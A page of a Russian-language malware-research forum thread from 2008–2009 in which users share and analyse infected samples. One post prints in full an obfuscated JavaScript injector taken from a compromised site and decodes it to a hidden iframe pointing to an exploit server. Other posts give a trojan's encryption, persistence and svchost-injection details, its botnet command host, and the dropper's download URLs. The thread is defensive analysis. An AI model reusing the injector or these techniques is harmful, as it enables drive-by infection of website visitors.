Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых) |
![]() |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
<< 1 ... 36 . 37 . 38 . 39 . 40 . 41 . 42 . 43 . 44 . 45 . 46 ... 47 . 48 . >> |
Посл.ответ | Сообщение |
|
Создано: 13 октября 2006 23:15 · Поправил: Модератор · Личное сообщение · #1 |
|
Создано: 14 декабря 2008 21:11 · Личное сообщение · #2 |
|
Создано: 14 декабря 2008 22:39 · Личное сообщение · #3 |
|
Создано: 15 декабря 2008 22:52 · Личное сообщение · #4 |
|
Создано: 21 декабря 2008 01:40 · Личное сообщение · #5 Во время регистрации на одном бесплатном хостинге, было предложено скачать прожку, которая проверяет ip, выдает код подтверждения что-то на сервере сравнивает. Иначе хост они не регистрируют. Я скачал, подтвердил регистрацию. Но потом в системе появился файл nvsyst32.exe. Раньше его не было. Прикрепляю оба файла. ![]() ![]() |
|
Создано: 21 декабря 2008 03:00 · Личное сообщение · #6 |
|
Создано: 21 декабря 2008 07:11 · Личное сообщение · #7 На auto.ru кстатете сейчас наблюдаю связку эксплоитов fiesta. админы там дебилы ![]() 21.12.2008 7:06:59 hxxp://91.211.64.191/f/load.php?id=144&spl=5 Internet Explorer Запрещено: Trojan.Win32.Inject.low при заходе на auto.ru ![]() ехе щас разбераю, стату ... как не сложно догадатся можно посматреть туд 91.211.64.191/f/admin.php ![]() |
|
Создано: 21 декабря 2008 17:55 · Личное сообщение · #8 |
|
Создано: 21 декабря 2008 17:57 · Личное сообщение · #9 |
|
Создано: 21 декабря 2008 18:16 · Личное сообщение · #10 |
|
Создано: 21 декабря 2008 19:51 · Поправил: inf1kek · Личное сообщение · #11 Ты смотри ![]() не прошло и дня, как они врубили "профилактику" ![]() собственно как оно было - вроде сам ифрейм "правельно" сделан, а вот эксплоит - вешает браузер и ехе палится ![]() ![]() На странице, можно было найти сей непримечательный код: <div class="block" align=center><script src=http://82.138.58.138/auto/banner.js?st></script></div> Причем, покрутив этот яваскрипт до конца я увидел: ffft="6d366d646d376c356d666d356d656c3630656c6c6c306d626c366d35306 3306c37676d626d6d6c306d316d666d3530326c376c306d37376630306d636c366c366 c323761306430643762373130653730373137313065376d37363065373137623731306 46d6d30646d626d656d366d356c6330656c326d636c32303030326d306d646c306d366 d356c30376630303732303030326c6c6d626d366c366d63376630303732303030326d6 36d356d626d6c6d636c3637663030373230303765376730646d626d6d6c306d316d666 d353765306c306237606d6d6d6d6c366c363766303036656d31366530303760";fftt= "";ftff="function ftft() {ftftf=eval;fffff=unescape;fttt=String.fromCharCode;fttf=Math.PI;ftfff =parseInt;ffttf=ftfff(~((fttf&fttf)|(~fttf&fttf)&(fttf&~fttf)|(~fttf&~ fttf)));ffftt=ftfff(((ffttf&ffttf)|(~ffttf&ffttf)&(ffttf&~ffttf)|(~fft tf&~ffttf))&1);ffff=ffftt<<ffftt;fttft=ffttf;for(fffft=ffttf;fffft<ftf f.length;fffft-=-ffftt) fttft+=ftfff(ftff.charCodeAt(fffft));fttft.toString();fttft%=fffff(0x6 4);for(fttff=ffttf;fttff<(ffft.length>>ffff);fttff-=-ffftt) {ffttt='';fftff='';for(ffftf=ffttf;ffftf<(ffftt<<ffff);ffftf-=-ffftt) if(ffftf<ffff) ffttt+=ffft.charAt(fttff*(ffff<<ffftt)+ffftf);else fftff+=ffft.charAt(fttff*(ffftt<<ffff)+ffftf);fftt+=fttt(fffff(0xFF)-f tfff(fffff('%'+(((ftfff(ffttt,(ffff<<ffftt)<<ffff)^fttft)<15.5)?ffttf. toString():'')+Math.round(ftfff(ffttt,(ffff<<ffftt)<<ffff)^fttft).toSt ring((ffff<<ffftt)<<ffff))+fffff('%'+(((fttft^ftfff(fftff,ffff<<(ffftt +ffff)))<15.5)?ffttf.toString():'')+Math.round(ftfff(fftff,ffff<<(ffft t+ffff))^fttft).toString(ffff<<(ffftt+ffff))),ffff<<(ffff+ffftt)));}tr y {ftftf(fftt);} catch(e) {try{eval(fftt);} catch(e) {fftf=ffftt;}try {if(fftf) {window.location='/';}} catch(e) {}}}ftft();";eval(ftff); нипанятно на что расчитывал автор, делая столько похожих на "глаз" переменных ![]() на что расчет? тем временем "крипт" легко расшифровывается и получается: <iframe src="http://91.211.64.191/f/index.php" border="0" width="0" height="0"></iframe> а дальше все понятно ![]() упдейт: после профилактики - ифрейм все висит ![]() ![]() ![]() |
|
Создано: 22 декабря 2008 15:27 · Поправил: GMax · Личное сообщение · #12 Trojan.Win32.Inject.low Имя файла: load.exe Размер: 17 Кб www.virustotal.com/ru/analisis/f0d657b9d5700bee01aa9744b46ddd16 <-- В файле практически нет строк в открытом виде, что необходимо для работы троян держит в зашифрованном виде. При необходимости расшифровывает нужные строки, использует, и зашифровывает обратно. Шифрование ведется с помощью не хитрой формулы: a[i]=(a[i]^(2*(i+1)))^7. Имена функций также не хранятся в открытом виде, используется хеш от имени. Программа записывает себя в автозапуск через ключ реестра: “SYSTEM\CurrentControlSet\Control\SecurityProviders” под именем digeste.dll. ![]() Программа использует в качестве мютекса строку BYPPROCNET, которая также хранится в зашифрованном виде. Далее троян запускает зомби процесс svchost.exe и копирует в него файл, который содержится в секции данных в зашифрованном виде. Размер: 9 Кб Time/Date Stamp (GMT): 17 декабря 2008 г. 21:18:10 www.virustotal.com/ru/analisis/afd200551216d0f3401d8225289654a1 <-- Сразу на точке входа троян инициализирует свой импорт, находит адреса нужных функций с помощью LoadLibrary и GetProcAddress. Причем имена функций не скрыты, а просто находятся в секции данных в открытом виде. Далее троян расшифровывает строки, которые содержат IP адрес сайта управляющего ботнетом 91.211.64.191. Бот скачивает и сайта файлы и запускает их на выполнение. Файлы могут быть запущенны под прикрытием процесса svchost.exe. ![]() ![]() |
|
Создано: 22 декабря 2008 17:50 · Личное сообщение · #13 |
|
Создано: 24 декабря 2008 22:47 · Личное сообщение · #14 Успешно прислали, второй раз - сам попросил. Откуда? - отсюда: evartist.narod.ru или live-counter.net/load.php?id=123456 Куда обращается load[1].exe (сам он из времменых файлов интернета): InternetOpenUrlA(CC0004,'http://webexperience13.com/o.php?4b7a705=1230 392&id=”л&v=6','0h',0,84000000,0) InternetOpenUrlA(CC0004,'http://microupdate80.info/pic_o1.gif?4e61536= 1230396&id=”л&v=6','0h',0,84000000,0) InternetOpenUrlA(CC0004,'http://microupdate80.info/template_momo.txt?4 f1b04d=1230403&id=”л&v=6','0h',0,84000000,0) Доигрался. Он догрузил себе код в тот же процесс и запустил, а я этого не уловил. Успел п.дла попортить несколько экзэшников. Потом я восстановил в течении часа все на место. А до этого 380 мБ программ пришлось выкинуть. По-остороженее с ним. На диске следов нет, кроме как заражает все экзешники. microupdate80.info - Rights restricted by copyright. See www.ripe.net/db/copyright.html webexperience13.com - тоже Интересно как антивирусники его детектят. ![]() |
|
Создано: 24 декабря 2008 22:58 · Личное сообщение · #15 |
|
Создано: 25 декабря 2008 08:04 · Личное сообщение · #16 Может KAV и умеет. Что-то сомневаюсь я в этом. Вирус новый наверное. Да я и сам мог бы научиться лечить, да лень-матушка. Я забыл включить фичу в санбоксе TEB.PPEB.PPEB_LDR_DATA.LIST_ENTRY : InInitializationOrderModuleList.Flink подменить там kernel32 на мой перехватчик. Не разобрался ещё с этим делом. Хотя этого мало. Вирус слишком умный. Лучше не играться с ним, а мочить 'в сортире' (временных файлах интернета) всё подряд. ![]() |
|
Создано: 05 января 2009 16:29 · Личное сообщение · #17 C младшими и их игрушками \ кряками_непонятно_откуда_слитыми мой комп превращается в полигон новых троев, вашу медь. Нод2.7 откровенно разочаровывает. Базы от 1.1.2009 в упор ничего в файле не видят. Сам ещё не ковырял, инжектируемую либу убил, а осталоное пока не смотрел. Очевидно, что то есть, ибо на www.kaspersky.ru/virusscanner и virustotal не пускает. hosts наверное. Вообщем это флешко-троян, стандартно, autorun.inf. Кстати, как так получается, что в inf куча левый байтов, как в куче какого-то hex мусора, а он нормально работает. По идее он текстового формата должен же быть? В аттаче набор с флешки, скрытые-системные, если что. ![]() ![]() |
|
Создано: 06 января 2009 12:56 · Личное сообщение · #18 Freecod вот вам с VT результаты: a-squared 4.0.0.73 2009.01.06 - AhnLab-V3 2009.1.5.3 2009.01.06 - AntiVir 7.9.0.45 2009.01.05 Worm/Kido.DH Authentium 5.1.0.4 2009.01.05 - Avast 4.8.1281.0 2009.01.05 - AVG 8.0.0.199 2009.01.05 Dropper.Generic.AFNC BitDefender 7.2 2009.01.06 - CAT-QuickHeal 10.00 2009.01.06 - ClamAV 0.94.1 2009.01.06 - Comodo 878 2009.01.05 - DrWeb 4.44.0.09170 2009.01.06 - eTrust-Vet 31.6.6293 2009.01.06 - Ewido 4.0 2008.12.31 - F-Prot 4.4.4.56 2009.01.05 - F-Secure 8.0.14470.0 2009.01.06 - Fortinet 3.117.0.0 2009.01.06 - GData 19 2009.01.06 - Ikarus T3.1.1.45.0 2009.01.06 Net-Worm.Win32.Kido K7AntiVirus 7.10.576 2009.01.05 - Kaspersky 7.0.0.125 2009.01.06 Net-Worm.Win32.Kido.dh McAfee 5486 2009.01.05 W32/Conficker.worm.gen.b McAfee+Artemis 5486 2009.01.05 W32/Conficker.worm.gen.b Microsoft 1.4205 2009.01.06 Worm:Win32/Conficker.B NOD32 3741 2009.01.05 - Norman 5.80.02 2009.01.02 - Panda 9.0.0.4 2009.01.05 W32/Conficker.C.worm PCTools 4.4.2.0 2009.01.05 - Prevx1 V2 2009.01.06 - Rising 21.11.12.00 2009.01.06 - SecureWeb-Gateway 6.7.6 2009.01.06 - Sophos 4.37.0 2009.01.06 Mal/Conficker-A Sunbelt 3.2.1809.2 2008.12.22 - Symantec 10 2009.01.06 W32.Downadup TheHacker 6.3.1.4.205 2009.01.05 - TrendMicro 8.700.0.1004 2009.01.06 WORM_DOWNAD.AD VBA32 3.12.8.10 2009.01.05 Net-Worm.Win32.Kido.dh ViRobot 2009.1.6.1546 2009.01.06 - VirusBuster 4.5.11.0 2009.01.05 - ----- Crack your mind, save the planet ![]() |
|
Создано: 06 января 2009 16:57 · Личное сообщение · #19 |
|
Создано: 06 января 2009 21:22 · Личное сообщение · #20 Freecod пишет: Кстати, как так получается, что в inf куча левый байтов, как в куче какого-то hex мусора, а он нормально работает. По идее он текстового формата должен же быть? Видимо, перед этой кучей мусора просто точка с запятой ; стоит, и вся строка до символа переноса считается закомментированной ----- Stuck to the plan, always think that we would stand up, never ran. ![]() |
|
Создано: 09 января 2009 14:59 · Личное сообщение · #21 Зверька подцепил, выводит сообщения что комп заражен и предложением запустить antispyware и что-то про какой-то там avi ![]() Веб 5, AVZ, Kaspersky Virus Removal Tool ничего не нашли, выцепил нодом. Все тулзы с последними базами были. В архиве сам exe и dll. ![]() ![]() |
|
Создано: 09 января 2009 19:52 · Личное сообщение · #22 Блин, везёт. А я бы автору мода, который подцепил я, яйца бы за быдлокодинг открутил. Т.к. описание файла dll было по русски, есть вероятность что он читает - "Выпрями руки, неудачник!" На SP3 его убожество регулярно роняет систему ошибкой svchost в AcGenral.dll, прягая в середину команды. Очевидно он себя не перетруждал, и сделал фикс. набор адресов api. Но сервис, распихивающий по флешкам, запрятал неплохо. Понятно что атачится к svchost, но длл в списке потоков так и не нашёл. Функционал дохнет только после убивства основной нити svchost. ![]() |
|
Создано: 10 января 2009 03:49 · Личное сообщение · #23 Аффтор прог захотел пойграть с софтом и вируснёй ![]() www.screen4all.com/ инсталлах вирусы =) Пример www.threatexpert.com/report.aspx?md5=0878bf8819a9712b4139b4b5efac03fc По ходу аффтор с украйны ![]() Атач с заразой ![]() ![]() |
|
Создано: 14 января 2009 14:23 · Личное сообщение · #24 тоже что-то подцеиил) никак не могу найти откуда растут у этого чуда ноги. до этого стоял нод смарт секьюрити(ну или как он там) вообщем переодически при выходе в сеть блочил IP ибо с него пыталось грузитсья какаято какашка. ну поставил outpost 2009 сообственно он тоже ничего не видит, удалил все атоматические правила и давай в ручную все смотреть. бестолку) в итоге из симтомов имеем: 1) лочиться доступ на следующие ресурсы microsoft.com, virustotal.com, virusinfo.ru, kaspersky.ru итп) если пытаюсь зайти на эти же ресурсы из винды которая находиться на ВмВаре то все норм) 2) у одного из svhost в раене 90 потоков(хз номр это или нет...раньше внимания не обращал), имеет в раене 10-15 подключений на 445 порту. всякие Rku и Avz ниче подозрительного не видят тока перехваты самого оутпоста) мож кто сталкивался с подобным?) ![]() |
|
Создано: 14 января 2009 14:44 · Личное сообщение · #25 |
|
Создано: 14 января 2009 16:00 · Личное сообщение · #26 |
|
Создано: 14 января 2009 16:02 · Личное сообщение · #27 |
|
Создано: 14 января 2009 17:37 · Поправил: pollllll_n · Личное сообщение · #28 Решил сделать такую справку. Может кому пригодиться Вирусы: примеры вирусов с подробным описанием их кода и принципов работы. А также, здесь можно найти много интересных документов и статей вирусной тематики. vcp.hut.ru VirusInfo. Сайт посвящён информационной безопасности. Межсетевые экраны, антивирусы, adware , spyware, firewall, всё что связано с обеспечением безопасности в интернете и на компе. virusinfo.info/ Страница Александра Гуськова. Авторские трояны с исходниками на msvc++. www.chat.ru/~alguszone AVTrojan. Всё для борьбы с троянцами. Постоянно обновляемый сайт программы AVTrojan. Можно скачать программы, обновления антивирусной базы, получить техническую поддержку. www.trojan.ru Чернобыльский CIH. Информация о вирусе W95.CIH . Обнаружение, лечение, ссылки на другие ресурсы о вирусах. www.chat.ru/~azv/virus/ Мифы о компьютерных вирусах. Новые вирусы. Список вирусов. kumite.com/myths/ Троянский клуб. Описания троянов, FAQ, новости. Результаты тестирования обнаружения троянов антивирусами. Форум. Троянские ссылки. trojansfaq.da.ru Безопасность в Интернет. Проблемы при работе в сети. Описание принципов работы программ типа "троян" и "nuke". www.aha.ru/support/0231.html Вирусные новости. Рассылка новостей. Новые вирусы. Список вирусов. Описания. Методы обнаружения и удаления. virusnews.h1.ru ![]() |
|
Создано: 14 января 2009 21:21 · Личное сообщение · #29 |
|
Создано: 16 января 2009 02:33 · Личное сообщение · #30 |
|
Создано: 16 января 2009 03:11 · Личное сообщение · #31 |
<< 1 ... 36 . 37 . 38 . 39 . 40 . 41 . 42 . 43 . 44 . 45 . 46 ... 47 . 48 . >> |
![]() |
eXeL@B —› Крэки, обсуждения —› Исследование вирусов |
Эта тема закрыта. Ответы больше не принимаются. |